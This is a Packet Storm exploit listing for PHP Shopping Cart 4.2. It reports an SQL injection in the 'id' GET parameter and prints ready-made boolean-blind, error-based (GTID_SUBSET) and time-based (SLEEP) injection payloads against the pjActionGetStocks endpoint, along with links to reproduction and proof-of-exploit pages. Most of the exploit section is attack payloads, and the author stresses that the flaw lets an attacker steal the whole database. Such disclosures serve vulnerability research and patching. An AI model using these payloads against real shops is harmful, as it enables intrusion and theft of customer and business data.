what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

PHP Shopping Cart 4.2 SQL Injection

PHP Shopping Cart 4.2 SQL Injection
Posted Sep 13, 2023
Authored by nu11secur1ty

PHP Shopping Cart version 4.2 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, php, sql injection
SHA-256 | 606411a83a93b9d6c705936cd642d323cf06f1e728faa5294bef0c1a617f8551

PHP Shopping Cart 4.2 SQL Injection

Change Mirror Download
## Title: PHP Shopping Cart-4.2 Multiple-SQLi
## Author: nu11secur1ty
## Date: 09/13/2023
## Vendor: https://www.phpjabbers.com/
## Software:https://www.phpjabbers.com/php-shopping-cart-script/#sectionPricing
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The `id` parameter appears to be vulnerable to SQL injection attacks.
A single quote was submitted in the id parameter, and a database error
message was returned. Two single quotes were then submitted and the
error message disappeared. The attacker easily can steal all
information from the database of this web application!
WARNING! All of you: Be careful what you buy! This will be your responsibility!

STATUS: HIGH-CRITICAL Vulnerability

[+]Payload:
```mysql
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: controller=pjFront&action=pjActionGetStocks&id=1') OR NOT
3795=3795-- sRcp&session_id=

Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (GTID_SUBSET)
Payload: controller=pjFront&action=pjActionGetStocks&id=1') AND
GTID_SUBSET(CONCAT(0x71717a6b71,(SELECT
(ELT(3820=3820,1))),0x7178627871),3820)-- kQZA&session_id=

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: controller=pjFront&action=pjActionGetStocks&id=1') AND
(SELECT 2625 FROM (SELECT(SLEEP(5)))nVyA)-- FGLs&session_id=
---

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/PHP-Shopping-Cart-4.2)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/09/php-shopping-cart-42-multiple-sqli.html)

## Time spent:
00:37:00


Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    66 Files
  • 9
    Oct 9th
    25 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close